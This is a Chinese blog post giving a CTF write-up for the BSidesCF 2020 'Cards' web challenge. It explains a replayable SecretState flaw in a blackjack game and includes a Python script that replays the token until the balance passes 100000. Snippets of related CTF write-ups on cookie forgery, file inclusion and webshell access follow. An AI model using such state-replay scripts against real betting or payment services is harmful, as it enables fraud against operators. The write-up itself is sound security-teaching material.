BUUCTF--[BSidesCF 2020]Cards

最新推荐文章于 2022-04-08 20:53:01 发布
最新推荐文章于 2022-04-08 20:53:01 发布
阅读量341 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/119811028
版权

每次请求都会有一个SecretState参数

访问/api可以得到一个 SecretState 这个是当前余额的一个哈希码

访问/api/deal可以进行赌博,但是只要我们的 state 不会变,我们的余额就不会变,当我们的应答包含 BlackJack 的时候,我们的余额会增加,然后我们就可以获取它的 SerectState 进行下一次赌博,这样就可以一直赢了

贴上大佬脚本

import requests

start = "http://b42cb231-7e9b-45db-a960-99f5fc875ca6.node3.buuoj.cn/api"
deal = start + "/deal"


# 开局
state = requests.post(start).json()["SecretState"]

while True:
    # 下注
    try:
        resp = requests.post(deal, json={"Bet": 500, "SecretState": state}).json()
    except:
        continue

    if resp['GameState'] == 'Blackjack':
        state = resp['SecretState']

    print(resp['Balance'])
    if resp['Balance'] > 100000:
        print(resp)
        break
Uzero.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[BUUCTF][BSidesCF 2020]Cards
Y4tacker的博客
10-20 3061
前言:很久没写博客了,虽然做了好多题,太懒了,这道题单纯就一个爬虫题目 文章目录思路wp 思路 我们在每次请求都会有一个SecretState参数,用来保存游戏状态,并且在客户端和服务端同步。这个参数没法篡改。每次请求,服务端都会生成一个新的SecretState,但是旧的SecretState并不失效,问题就出在于此。 游戏如果赢了,就更新SecretState,如果输了,则不更新SecretState。这样就可以达到类似一种分数只增不减的效果。 但是有个问题,下注之后要开牌的话,必须得用新的Secret
BUU [BSidesCF 2020]Cards
Jay17的博客
07-24 477
BUU [BSidesCF 2020]Cards
[BSidesCF 2019]Kookie and [BSidesCF 2020]Cards
shinygod的博客
04-08 3820
知识点:cookie伪造 [BSidesCF 2019]Kookie 提示我们要以以admin身份登录,还告诉我们在cookie中,那答案呼之欲出。 在cookie中加入username=admin [BSidesCF 2020]Cards 做题目之前先了解一下21点的规则: 二十一点玩法规则和概率在二十一点游戏中,拥有最高点数的玩家获胜,其点数必须等于或低于21点;超过21点的玩家称为爆牌。 2点至10点的牌以牌面的点数来相加,J、Q、K 每张为10点。 A可记为1点或为11点,若玩家会因A而爆牌则
[BSidesCF 2020]Had a bad day
chbeloved的博客
07-24 296
[BSidesCF 2020]Had a bad day 界面就给了俩选项,网页源码也没啥东西,随便点一个选项,也看起来没啥用 但是点了后发现可能是sql,但是sql试过了不行 这个页面源码有个index.php引起了注意。 试着用filter去找源码。 有include,说明是包含的,又看到php.php,应该是系统自己添加上去的,那我们就不输入.php试试 成功拿到源码。 这一段码要求输入要带有woofers或meowers或index(我们传入的category放到了category放到了cate
BUUCTF [BSidesCF 2020] Hurdles
Senimo
01-07 1206
BUUCTF [BSidesCF 2020] Hurdles 考点: HTTP 请求中的Header 参数 curl命令的常用参数 启动环境: 只给出了一句话:若要获得flag,需要克服些障碍,其中/hurdles猜测为URL路径,访问得到: 需要使用PUT方式请求,使用curl命令,完成: curl -X PUT http://node3.buuoj.cn:28174/hurdles 其中-X表示指定HTTP请求方式 得到返回结果: 抱歉,若路径以!结尾,将更加刺激,所以在末尾填入!,也就是/
react-credit-cards:用于付款表格的漂亮信用卡
02-05
import Cards from ' react-credit-cards ' ; export default class PaymentForm extends React . Component { state = { cvc : ' ' , expiry : ' ' , focus : ' ' , name : ' ' , number
pokemon-cards
03-10
在"pokemon-cards-main"这个文件夹中,我们可以预期找到项目的核心源代码,包括HTML文件(可能命名为index.html或其他有意义的名字)来定义页面结构,CSS文件(如styles.css)来控制样式,以及可能的JavaScript文件...
react-ui-cards:准备使用卡组件进行React
04-28
现场演示npm 安装$ npm install --save react-ui-cards发展入门克隆存储库后,运行以下命令以热加载方式在开发模式下启动项目: $ npm install$ npm run dev贡献欢迎所有贡献。 您可以在现有卡中添加一些内容,也...
subtitle-cards:带有字幕的系列英语屏幕截图的一些集合
04-05
压缩包子文件的文件名称列表只给出了"subtitle-cards-master",这可能是一个项目的主文件夹,包含了所有关于这个字幕卡片项目的核心代码、图像资源、配置文件等。用户可能需要解压这个文件,然后根据提供的说明或者...
Flash-Cards-开源
05-12
《开源闪存卡片应用——Flash-Cards》 在信息技术领域,学习和记忆是提升技能的重要环节,而Flash-Cards开源项目则为此提供了便利。这款由Joshua Dwire开发的闪存卡应用程序,旨在帮助用户利用台式计算机以及...
BUUCTF:[BSidesCF 2020]Had a bad day
末初的CSDN博客
03-30 5396
BUUCTF:[BSidesCF 2020]Had a bad day 可能存在SQL注入或者文件包含,在我尝试读取index.php源码的时候出现了报错信息 的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败在后面测试的时候,发现除掉后缀即可读取到源码 base64解码读取源码 <?php $file = $_GET['category']; ...
[BMZCTF-pwn] 43-gactf2020-card
weixin_52640415的博客
02-20 232
libc-2.31的堆题第一次见,学习了。 有add建块,edit写数据(strcpy有截断,加\0),free删除,还有个后门edit直接read 漏洞点: 这里有个未初始化指针漏洞。当建块长度为0时并不会读入数据,而是直接将上次的数据复制到指针里。 char *__fastcall sub_1497(char *a1, unsigned int a2) { memset(src, 0, (int)a2); read(0, src, a2); return strcpy(a1, sr
BSidesSF 2020 CTF writeup
蚁景网安学院
03-17 907
前言前一段时间玩了下BsidesSF 2020,本文记录了所有WEB题的解答。Writeupcsp-1前3道都是考察CSP绕过,直接来看CSP规则:content-security-po...
BUUCTF之N种解决方法
金 帛的博客
03-18 635
BUUCTFWP
BUUCTF [BJDCTF2020]Easy MD5
SopRomeo的博客
03-19 1995
随便提交抓包 出题人真的恶心,把sql查询语句放在响应头里(刚开始看到题我是懵逼的) select * from 'admin' where password=md5($pass,true) 百度搜了搜md5($pass,true) 绕过方法 输入fifdyop 有一段注释代码,MD5弱类型绕过 ?a=QNKCDZO&b=s878926199a 输入后又来强类型绕过之前写了博...
CTF题 BUUCTF之[极客大挑战 2019]Knife 1
weixin_44632787的博客
06-17 3377
CTF题 BUUCTF之[极客大挑战 2019]Knife 1 启动我们的挑战项目 这里的题目简直就是在提示我们用中国菜刀连接,但是由于个人习惯这里我就用中国蚁剑来连接了。(其实中国蚁剑和中国菜刀的功能差不多,不过个人感觉蚁剑更好用一些吧)。 现在来打开我们的蚁剑工具 然后填上我们的连接和密码:Syc 然后进入到对方的登录后台 最后到这个后台的根目录下就可以找到flag值 如果你不能一下子就看出来是用蚁剑这些工具来连接,那可能是因为你做题的经验还不够。做多了自然而然就能想到了。总的来说,这题属于
CTF_打卡DAY1&DAY2
煤矿路口西的博客
06-01 734
跟着《深入浅出密码学——常用加密技术原理与应用》学 一 P1-P15 x明文;y密文;k密钥;所有可能密匙的集合-密钥空间 蛮力攻击 作为刚接触CTF一个月的小白,大部分情况下是凭借蛮力攻击,也叫穷尽密钥搜索。 这是一种很笨的方法,不过在密码学的极少数题目中还是挺有用的。 因为已知格式为flag{}或ctf{}。 字母频率攻击 顾名思义,英语中某些字母的出现频率相对较高。文本越多,准确率较高。 模运算 8+4=3 mod 9 因为42 = 4*9+6,所以42=6 mod 9 其中,模约简: 3^8 =
CTF密码学简单加密介绍
Toufahaizai的博客
03-16 3772
波利比奥斯棋盘 当铺密码 倒叙加密 倒叙加密: 就是:ABCDE 加密后就变为 EDCBA,这里需要注意的是,倒叙加密方式除了全部倒叙外,还有单词倒叙,也就是说:ni hao 加密后可变为 in oah 也可变为oah in,这点解密时需要注意。 4.电脑键盘棋盘加密 5.电脑键盘坐标加密 6.电脑键盘QWE加密法 二进制加密解密法 二进制的1101转化成十进制 1101(2)...
005 - 马科维茨投资组合理论实现
最新发布
08-10
python基于tushare实现马科维茨投资组合理论实现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值